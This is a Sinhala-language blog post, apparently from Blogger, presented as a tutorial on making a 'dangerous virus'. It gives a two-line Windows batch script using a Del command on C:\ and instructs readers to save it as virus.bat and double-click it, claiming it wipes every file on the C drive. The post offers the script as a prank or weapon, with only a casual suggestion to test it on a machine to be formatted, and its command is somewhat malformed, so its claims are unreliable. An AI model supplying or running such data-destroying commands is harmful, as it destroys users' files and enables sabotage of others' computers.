කොහොමද ඔයාලට මම අද අරගෙන අවේ වෙනස් දෙයක් virus එකක් හදන හැටි හැබයි පොඩි දෙයක් නෙවේ ටිකක් බයානක එකක් clink උනොත් දෙයියන්ගේම පිහිටයි 
දැන් ඉතින් ජනප්ප්‍රිය රැල්ලනේ Virus හදන එක.... ඉතින් මාත් හිතුව ඔයගොල්ලන්ට Virus එකක් හදන ව්දිහ කියල දෙන්න....

මුලින්ම මේ පහත ads එක ඔබල ඉන්නකෝ :D







මේක ගැන කිව්වොත් ,

       Virus එක පොඩි උනාට හරිම Dangerous එකක්..... මේක ඇවිල්ල..මිනිත්තුවක් යන්න ඉස්සෙල්ල හදාගන්න පුළුවන් උනාට C Drive එකේ තියෙන ඔක්කොම Files Delete කරනවා

1. හරි එහෙනම් මුලිනම් මේ මම පහතින් දාන code එක copy කරගෙන notepad එකට past එකක් දා ගන්නකො   

                                                                       @Echo off

  Del C:\ *.* |y


2. ඊට පස්සේ ඕක save කරනකොට Name එක ව්දිහට virus.bat (ඕකේ Name එකට ඕන එකක් දෙන්න ඒත් .bat කියල අනිවාර්යෙන්ම දාන්න ඕනෙ
  
3. දැන් ඔයා save කරපු තැනට ආපු Icon එක Dobble Click කලාම,,,,,,, C Drive එකේ තියෙන 
ඔක්කොම Files Delete වෙනවා......හරිය.......


උඩ කියපු දේම මන් අයෙත් කියන්නම් ඔයගොල්ලෝ මේක ෆොර්මටේ කරන්න ඕනේ Computer එකක අත්හදා බැලුවට කමක් නැ.


* _______________________________________________________ *
වෙබ් අඩවියේ සාමාජිකයෙකු වීමට වම් පස පහලම Join This Site මත Click කරන්න.ඔබට එවිට එසැනින් අලුත් ලිපි ලබා ගත හැක.


තවත් මේවගේ වටින කියන ලිපියකින් හමුවෙමු.

ඔබේ වටිනා අදහස් පහතින් දාන්නත් පුලුවන්
Amazin
Powered by Blogger.